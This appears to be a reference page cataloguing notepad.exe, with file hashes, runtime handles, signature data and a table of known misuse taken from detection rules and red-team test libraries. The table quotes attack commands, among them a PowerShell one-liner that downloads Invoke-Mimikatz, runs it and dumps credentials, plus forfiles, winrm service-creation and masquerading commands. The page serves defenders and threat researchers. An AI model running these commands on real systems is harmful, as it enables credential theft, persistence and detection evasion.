notepad.exe

  • File Path: C:\Windows\system32\notepad.exe
  • Description: Notepad

Screenshot

notepad.exe

Hashes

Type Hash
MD5 054F6E4419404C94F35888CEA6B4DE32
SHA1 FE48F836ED5264320F4C28E01A4225DC01329D11
SHA256 CA2837031952C32BC1639A416F5C2ADCEEBF33507D216E554A3B47B17C52E9B1
SHA384 5FC86291D631CC82FC2F03B9CEB6CF9C7004A180445BD8ACDA31A594376B3FB7325AD1BA448F41832BA683640F75E700
SHA512 F7B941B8351F1A8203AEE6D7794295AA2B111E0F609A0D07DED4CEC6651A7AD751F7623DF2B90862E4A47E1AD0D873E8D363A91954A78DEB181CFD62362B232A
SSDEEP 6144:vFbZ7SPu5J0DQ/zaQg56AOhB7ZrgeI5tT/fUWIzh:BZ75J0DQ/rg56Ae7ZMeI5C3t
IMP 4089A6EA56504C3C66D7744AC0A8131A
PESHA1 4E5100BFA9D55EF9B19982FD7C7B821ADFA549C9
PE256 B5D7BBAA1245FF0507504B565B2C4ED4BBE3225A407705D2A20CD6598A15A4AB

Runtime Data

Window Title:

Untitled - Notepad

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\notepad.exe.mui File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(R-D) C:\Windows\SystemResources\notepad.exe.mun File
(RW-) C:\Users\user File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_ca04af081b815d21 File
\BaseNamedObjects__ComCatalogCache__ Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\BaseNamedObjects\windows_shell_global_counters Section
\Sessions\1\Windows\Theme1175649999 Section
\Windows\Theme601709542 Section

Loaded Modules:

Path
C:\Windows\System32\combase.dll
C:\Windows\System32\GDI32.dll
C:\Windows\System32\gdi32full.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\system32\notepad.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\USER32.dll
C:\Windows\System32\win32u.dll

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: NOTEPAD.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/76
  • VirusTotal Link: https://www.virustotal.com/gui/file/ca2837031952c32bc1639a416f5c2adceebf33507d216e554a3b47b17c52e9b1/detection

File Similarity (ssdeep match)

File Score
C:\Windows\notepad.exe 100

Possible Misuse

The following table contains possible examples of notepad.exe being misused. While notepad.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma image_load_susp_image_load.yml - '\notepad.exe' DRL 1.0
sigma net_connection_win_notepad_network_connection.yml title: Notepad Making Network Connection DRL 1.0
sigma net_connection_win_notepad_network_connection.yml description: Detects suspicious network connection by Notepad DRL 1.0
sigma net_connection_win_notepad_network_connection.yml - https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/ DRL 1.0
sigma net_connection_win_notepad_network_connection.yml Image\|endswith: '\notepad.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Users\\*\AppData\Local\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Users\\*\AppData\Roaming\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Program Files\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Program Files (x86)\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - Execution of tools named GUP.exe and located in folders different than Notepad++\updater DRL 1.0
LOLBAS Gpup.yml Description: Execute another command through gpup.exe (Notepad++ binary).  
LOLBAS Gpup.yml - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe '  
LOLBAS Explorer.yml - Command: explorer.exe C:\Windows\System32\notepad.exe  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe  
LOLBAS Forfiles.yml Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"  
LOLBAS Forfiles.yml Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.  
LOLBAS pester.yml - Command: Pester.bat [/help\|?\|-?\|/?] "$null; notepad"  
LOLBAS pester.yml Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad  
LOLBAS Winrm.yml - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'  
LOLBAS Winrm.yml - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'  
LOLBAS Cdb.yml - Command: cdb.exe -cf x64_calc.wds -o notepad.exe  
LOLBAS Dxcap.yml - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe  
LOLBAS Dxcap.yml Description: Launch notepad as a subprocess of Dxcap.exe  
atomic-red-team index.md - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md cmd.exe /c %APPDATA%\notepad.exe /B MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md del /Q /F %APPDATA%\notepad.exe >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1047.md When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. MIT License. © 2018 Red Canary
atomic-red-team T1047.md | process_to_execute | Name or path of process to execute. | String | notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1047.md The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1047.md You should expect to see notepad.exe running after execution of this test. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute “notepad.exe” within MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md With default arguments, expect to see a MessageBox, with notepad’s icon in taskbar. MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md | sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | String | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md | spawnto_process_name | Name of the process to spawn | String | notepad| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md This module executes notepad.exe from within the WINWORD.EXE process MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md $url=’https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1’;$wshell=New-Object -ComObject WScript.Shell;$reg=’HKCU:\Software\Microsoft\Notepad’;$app=’Notepad’;$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName(‘System.Windows.Forms’);@(@(‘iWindowPosY’,(String).Split(‘}’)[0].Split(‘=’)[5]),@(‘StatusBar’,0))|ForEach{SP $reg (Item Variable:).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:).Value.id-ieq$curpid}|ForEach{(Variable ).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys(‘^o’);Start-Sleep -Milliseconds 500;@($url,(‘ ‘*1000),’~’)|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@(‘^a’,’^c’)|ForEach{$wshell.SendKeys((Item Variable:).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@(‘%f’,’x’)|ForEach{$wshell.SendKeys((Variable ).Value)};If(GPS|?{(Item Variable:).Value.id-ieq$curpid}){@(‘{TAB}’,’~’)|ForEach{$wshell.SendKeys((Item Variable:).Value)} };@(‘iWindowPosDY’,’iWindowPosDX’,’iWindowPosY’,’iWindowPosX’,’StatusBar’)|ForEach{SP $reg (Item Variable:).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr MIT License. © 2018 Red Canary
atomic-red-team T1105.md Upon successful execution the test will open calculator and Notepad executable for 10 seconds. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Spawns a notepad.exe process as a child of the current process. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md | parent_name | Parent process to spoof from | Path | $Env:windir\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1197.md This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of “svchost.exe” and an Initiating Process Command Line of “svchost.exe -k netsvcs -p -s BITS” MIT License. © 2018 Red Canary
atomic-red-team T1197.md | command_path | Path of command to execute | Path | C:\Windows\system32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1202.md forfiles /p c:\windows\system32 /m notepad.exe /c #{process} MIT License. © 2018 Red Canary
atomic-red-team T1202.md | process | Process to execute | String | notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md Copy-Item -Path “$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe” -Destination “$Env:windir\System32\Tasks\notepad.exe” MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md InstallUtilPath = “$Env:windir\System32\Tasks\notepad.exe” MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md Remove-Item -Path “$Env:windir\System32\Tasks\notepad.exe” -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md | exe_to_launch | Path of the executable to launch | Path | %windir%\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md Change Default File Association From cmd.exe of hta to notepad. MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| MIT License. © 2018 Red Canary
atomic-red-team T1546.003.md After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. MIT License. © 2018 Red Canary
atomic-red-team T1546.003.md CommandLineTemplate=”$($Env:SystemRoot)\System32\notepad.exe”;} MIT License. © 2018 Red Canary
atomic-red-team T1546.010.md AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don’t keep getting message boxes showing up. MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md <blockquote>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md | target_binary | Binary To Attach To | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1547.002.md After a reboot, Notepad.exe will be executed as child process of lsass.exe. MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md | command.to.execute | Command to execute | String | cmd.exe /c notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md folder to view that the alternate data stream exists. To view the data in the alternate data stream, run “notepad T1564.004_has_ads.txt:adstest.txt” MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run “notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt” in the %temp% folder. MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md - Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md ## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | Path | PathToAtomicsFolder\T1574.002\bin\GUP.exe| MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md the notepad process will not execute with high integrity. MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. MIT License. © 2018 Red Canary
signature-base apt_bluetermite_emdivi.yar $s4 = “\NOTEPAD.EXE” fullword ascii CC BY-NC 4.0
signature-base apt_molerats_jul17.yar $s2 = “Notepad++.exe” fullword wide CC BY-NC 4.0
signature-base apt_olympic_destroyer.yar $s3 = “\system32\notepad.exe” fullword wide CC BY-NC 4.0
signature-base apt_poisonivy.yar $s0 = “\notepad.exe” fullword ascii /* score: ‘11.025’ */ CC BY-NC 4.0
signature-base apt_ta17_293A.yar $au2 = “/notepad.png” CC BY-NC 4.0
signature-base apt_wildneutron.yar $n1 = “/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\notepad.exe > %s & del /f %s” fullword ascii /* PEStudio Blacklist: strings / / score: ‘46.00’ */ CC BY-NC 4.0
signature-base apt_woolengoldfish.yar $s4 = “oShellLink.IconLocation = "notepad.exe, 0"” fullword CC BY-NC 4.0
signature-base crime_ransom_ragna_locker.yar $s2 = “\notepad.exe” fullword wide /* Show ransom note to the victim*/ CC BY-NC 4.0
signature-base gen_cn_hacktools.yar $s14 = “NOTEPAD.EXE result.txt” fullword ascii CC BY-NC 4.0
signature-base gen_powershell_empire.yar $s2 = “$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru” fullword ascii CC BY-NC 4.0
signature-base thor_inverse_matches.yar description = “Abnormal notepad.exe - typical strings not found in file” CC BY-NC 4.0
signature-base thor_inverse_matches.yar $winxp = “Software\Microsoft\Notepad” wide CC BY-NC 4.0
signature-base thor_inverse_matches.yar $winxp_de = “Software\Microsoft\Notepad” wide CC BY-NC 4.0
signature-base thor_inverse_matches.yar filename == “notepad.exe” CC BY-NC 4.0
stockpile 3796a00b-b11d-4731-b4ca-275a07d83299.yml Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential; Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.